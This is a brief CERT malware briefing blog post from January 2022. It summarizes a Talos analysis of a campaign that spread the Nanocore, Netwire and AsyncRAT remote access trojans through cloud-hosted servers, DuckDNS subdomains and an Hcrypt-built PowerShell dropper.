Briefing Malware
BLOG CERT SOGETI ESEC
CERT BRIEFING MALWARE

Briefing Malware - 18/01/2022

18th of January 2022 - Winners of the 3rd week : Redline, NjRAT and Nanocore.

Some links points at extended actionnable intelligence (Threat Bulletins, TTPs, signatures, etc) on our Threat Intelligence Platform Anomali. This access is limited to our clients.

 

Threat statistics report

Publication date:

18/01/2022

Distribution :

TLP : WHITE  

What's new?

Nanocore (ID Mitre: S0336) / AsyncRAT (NC)

Nanocore, Netwire and AsyncRAT spreading campaign uses public cloud infrastructure

#Cisco Talos analyzed a malicious campaign spotted at the end of October 2021 that delivered some Remote Access Trojan (#RAT), mostly across United States, Italy and Singapore.

The threat actor, which has not been named by Talos, deployed a distributed infrastructure depending on cloud resources such as #Amazon AWS EC2 or #Microsoft Azure instances to host their Command-And-Control (#C&C) servers and even deployed some web servers to host malwares like #Nanocore, #AsyncRAT or #Netwire. They created malicious DNS subdomains via #DuckDNS, a free dynamic DNS service, to resolve download servers.

A #PowerShell dropper has been identified, built with #Hcrypt crypter, in the infection chain which was already been spotted by #TrendMicro researchers in a previous campaign named Water Basilisk (source). Hcrypt is considered as a #crypter-as-a-service and give access to sophisticated malware deployment with a minimal investment to several threat actors having not enough time or resources for that.

 

https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html

 

Download the report

 

 

Print Email